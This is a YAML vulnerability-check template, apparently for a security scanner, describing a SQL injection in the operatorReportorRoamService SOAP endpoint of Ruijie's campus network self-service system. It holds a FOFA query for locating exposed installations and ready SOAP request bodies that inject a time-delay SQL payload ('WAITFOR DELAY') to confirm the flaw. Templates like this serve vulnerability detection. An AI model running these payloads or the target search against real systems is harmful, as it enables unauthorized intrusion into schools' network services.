product: 锐捷校园网自助服务系统
vName: 锐捷校园网自助服务系统 operatorReportorRoamService接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: SQL注入被广泛用于非法入侵网站服务器，获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中，对用户输入的数据没有做好过滤，导致恶意用户可以构造一些SQL语句让服务器去执行，从而导致数据库中的数据被窃取，篡改，删除，以及进一步导致服务器被入侵等危害。
version: ''
note: ''
search:
  FOFA: app="校园网自助服务系统" || title=="校园网自助服务系统"
protocol: http
link: https://blog.csdn.net/weixin_43167326/article/details/138156889
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /selfservice/service/operatorReportorRoamService
      header:
        Content-Type: text/xml;charset=UTF-8
      data: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://service.webservice.common.spl.ruijie.com\">\n<soapenv:Header/>\n    <soapenv:Body>\n    <ser:queryOperatorUuid>\n      <!--type: string-->\n    <ser:in0>';WAITFOR DELAY '0:0:5'--</ser:in0>\n    </ser:queryOperatorUuid>\n    </soapenv:Body>\n</soapenv:Envelope>"
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: post
      follow: false
      path: /selfservice/service/operatorReportorRoamService
      header:
        Content-Type: text/xml;charset=UTF-8
      data: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://service.webservice.common.spl.ruijie.com\">\n<soapenv:Header/>\n    <soapenv:Body>\n    <ser:queryOperatorUuid>\n      <!--type: string-->\n    <ser:in0>';WAITFOR DELAY '0:0:0'--</ser:in0>\n    </ser:queryOperatorUuid>\n    </soapenv:Body>\n</soapenv:Envelope>"
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3